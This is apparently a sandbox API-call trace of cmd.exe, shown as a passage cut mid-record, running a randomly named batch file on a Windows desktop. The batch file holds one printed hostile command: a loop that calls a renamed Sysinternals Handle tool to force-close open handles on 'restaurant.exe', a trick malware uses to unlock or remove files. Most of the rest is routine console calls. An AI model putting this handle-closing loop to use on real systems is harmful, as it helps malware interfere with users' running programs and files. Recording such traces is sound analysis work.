0x3c [0291.776] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf124 | out: lpMode=0xfcf124) returned 1 [0291.934] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.934] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcf13c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcf13c*=0x1e) returned 1 [0292.792] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.792] GetFileType (hFile=0x3c) returned 0x2 [0292.792] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0292.792] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3c4 | out: lpMode=0xfcf3c4) returned 1 [0292.963] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.963] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12881b8*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3dc, lpReserved=0x0 | out: lpBuffer=0x12881b8*, lpNumberOfCharsWritten=0xfcf3dc*=0x2) returned 1 [0293.169] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3e4 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0293.169] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.169] GetFileType (hFile=0x3c) returned 0x2 [0293.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.169] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0293.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.276] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x25) returned 1 [0293.498] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf3f8 | out: _Buffer="\r\n") returned 2 [0293.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.498] GetFileType (hFile=0x3c) returned 0x2 [0293.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0293.498] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3d0 | out: lpMode=0xfcf3d0) returned 1 [0293.799] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.799] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3e8*=0x2) returned 1 [0294.264] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0294.264] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0294.264] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0294.264] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0294.264] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0294.264] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0294.264] GetConsoleTitleW (in: lpConsoleTitle=0xfcef68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0295.012] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0295.012] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0295.012] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0295.012] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0295.012] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0295.012] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0295.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0295.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0295.012] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xfced20, nVolumeNameSize=0x104, lpVolumeSerialNumber=0xfced18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xfced18*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0295.012] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0295.012] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xfceac4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0295.013] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0xfceac4, lpFilePart=0xfceabc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0xfceabc*=0x0) returned 0x1e [0295.013] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0295.013] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xfce840 | out: lpFindFileData=0xfce840) returned 0x1270b68 [0295.013] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0295.013] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xfce840 | out: lpFindFileData=0xfce840) returned 0x1270b68 [0295.013] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0295.013] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0295.013] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xfce840 | out: lpFindFileData=0xfce840) returned 0x1270b68 [0295.013] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0295.013] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0295.013] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0295.013] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0295.013] GetEnvironmentStringsW () returned 0x127cd58* [0295.013] FreeEnvironmentStringsA (penv="=") returned 1 [0295.013] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0295.013] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.013] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0295.602] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.602] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.011] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.011] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.118] SetConsoleInputExeNameW () returned 0x1 [0296.118] GetConsoleOutputCP () returned 0x1b5 [0296.256] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.256] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.272] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0296.272] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0296.272] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.272] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0296.272] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.272] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0296.272] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0x94, lpOverlapped=0x0) returned 1 [0296.272] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0296.273] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.273] GetFileType (hFile=0xb0) returned 0x1 [0296.273] _get_osfhandle (_FileHandle=3) returned 0xb0 [0296.273] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0296.273] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"restaurant.exe\"") returned 0x10 [0296.273] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0296.273] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0296.273] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0296.273] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0296.273] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0296.273] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0296.274] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0296.274] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0296.274] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0296.274] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0296.274] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0296.274] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0296.274] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0296.274] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0296.274] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0296.274] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0296.275] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0296.275] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0296.275] _tell (_FileHandle=3) returned 226 [0296.275] _close (_FileHandle=3) returned 0 [0296.276] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf148 | out: _Buffer="\r\n") returned 2 [0296.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.276] GetFileType (hFile=0x3c) returned 0x2 [0296.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf120 | out: lpMode=0xfcf120) returned 1 [0296.286] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.286] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf138, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf138*=0x2) returned 1 [0296.288] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.288] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcf144 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0296.288] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcf144 | out: _Buffer=">") returned 1 [0296.288] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.288] GetFileType (hFile=0x3c) returned 0x2 [0296.289] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.289] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf124 | out: lpMode=0xfcf124) returned 1 [0296.294] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.294] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcf13c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcf13c*=0x1e) returned 1 [0296.297] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xfcf3e4 | out: _Buffer="FOR") returned 3 [0296.297] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.297] GetFileType (hFile=0x3c) returned 0x2 [0296.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.297] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0296.301] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.301] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x3) returned 1 [0296.310] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xfcf3e4 | out: _Buffer=" /F") returned 3 [0296.310] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.310] GetFileType (hFile=0x3c) returned 0x2 [0296.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.310] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0296.313] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.313] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x3) returned 1 [0296.316] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0xfcf3e4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0296.316] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.316] GetFileType (hFile=0x3c) returned 0x2 [0296.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.316] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0296.321] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.321] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x20) returned 1 [0296.323] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xfcf3e4 | out: _Buffer=" %I IN ") returned 7 [0296.323] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.323] GetFileType (hFile=0x3c) returned 0x2 [0296.323] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.323] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0296.325] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.325] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x7) returned 1 [0296.328] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xfcf3e0 | out: _Buffer="(`vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner`) DO ") returned 59 [0296.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.328] GetFileType (hFile=0x3c) returned 0x2 [0296.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.328] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3b8 | out: lpMode=0xfcf3b8) returned 1 [0296.331] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.331] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0xfcf3d0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d0*=0x3b) returned 1 [0296.332] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.332] GetFileType (hFile=0x3c) returned 0x2 [0296.332] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.332] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3c4 | out: lpMode=0xfcf3c4) returned 1 [0296.334] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.334] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcf3dc, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xfcf3dc*=0x1) returned 1 [0296.335] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.335] GetFileType (hFile=0x3c) returned 0x2 [0296.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.335] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3b4 | out: lpMode=0xfcf3b4) returned 1 [0296.336] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.336] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x127cb30*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xfcf3cc, lpReserved=0x0 | out: lpBuffer=0x127cb30*, lpNumberOfCharsWritten=0xfcf3cc*=0xc) returned 1 [0296.341] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3d4 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0296.341] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.341] GetFileType (hFile=0x3c) returned 0x2 [0296.341] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.341] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3ac | out: lpMode=0xfcf3ac) returned 1 [0296.342] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.342] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0xfcf3c4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3c4*=0x26) returned 1 [0296.375] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3e4 | out: _Buffer=") ") returned 2 [0296.375] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.375] GetFileType (hFile=0x3c) returned 0x2 [0296.375] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.375] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0296.385] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.385] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x2) returned 1 [0296.392] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf3f8 | out: _Buffer="\r\n") returned 2 [0296.392] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.393] GetFileType (hFile=0x3c) returned 0x2 [0296.393] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.393] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3d0 | out: lpMode=0xfcf3d0) returned 1 [0296.412] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.412] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3e8*=0x2) returned 1 [0296.413] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0296.413] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0296.413] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0296.413] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0296.413] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0296.413] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0296.413] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0296.413] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0xfcf320, _Radix=0 | out: _EndPtr=0xfcf320*=",6 delims=: \"") returned 3 [0296.413] wcstol (in: _String="6 delims=: \"", _EndPtr=0xfcf320, _Radix=0 | out: _EndPtr=0xfcf320*=" delims=: \"") returned 6 [0296.413] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0296.413] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0296.413] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0296.413] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0296.413] _wpopen (_Command="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner", _Mode="rb") returned 0x77981268 [0296.425] feof (_File=0x77981268) returned 0 [0296.425] ferror (_File=0x77981268) returned 0 [0296.425] fgets (in: _Buf=0x127eb98, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0298.460] feof (_File=0x77981268) returned 0 [0298.460] ferror (_File=0x77981268) returned 0 [0298.460] fgets (in: _Buf=0x127ebde, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0298.460] feof (_File=0x77981268) returned 0 [0298.460] ferror (_File=0x77981268) returned 0 [0298.461] fgets (in: _Buf=0x127f971, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0299.588] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0299.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x127f971, cbMultiByte=73, lpWideCharStr=0x127f928, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0299.590] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf000 | out: _Buffer="\r\n") returned 2 [0299.590] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.590] GetFileType (hFile=0x3c) returned 0x2 [0299.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.590] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefd8 | out: lpMode=0xfcefd8) returned 1 [0299.669] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.669] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfceff0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfceff0*=0x2) returned 1 [0299.669] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0299.669] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfceffc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0299.669] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfceffc | out: _Buffer=">") returned 1 [0299.669] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.669] GetFileType (hFile=0x3c) returned 0x2 [0299.669] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.669] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefdc | out: lpMode=0xfcefdc) returned 1 [0299.669] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.669] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfceff4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfceff4*=0x1e) returned 1 [0299.670] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.670] GetFileType (hFile=0x3c) returned 0x2 [0299.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.670] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf27c | out: lpMode=0xfcf27c) returned 1 [0299.670] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.670] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfcf294, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0xfcf294*=0x1) returned 1 [0299.670] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.670] GetFileType (hFile=0x3c) returned 0x2 [0299.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.670] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf26c | out: lpMode=0xfcf26c) returned 1 [0299.670] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.670] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12886a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0xfcf284, lpReserved=0x0 | out: lpBuffer=0x12886a0*, lpNumberOfCharsWritten=0xfcf284*=0xc) returned 1 [0299.670] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf28c | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0299.670] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.670] GetFileType (hFile=0x3c) returned 0x2 [0299.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.670] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf264 | out: lpMode=0xfcf264) returned 1 [0299.671] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.671] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xfcf27c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf27c*=0x2c) returned 1 [0299.671] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf29c | out: _Buffer=") ") returned 2 [0299.671] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.671] GetFileType (hFile=0x3c) returned 0x2 [0299.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.671] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf274 | out: lpMode=0xfcf274) returned 1 [0299.671] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.671] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf28c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf28c*=0x2) returned 1 [0299.671] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf2b0 | out: _Buffer="\r\n") returned 2 [0299.671] _get_osfhandle (_FileHandle=1) 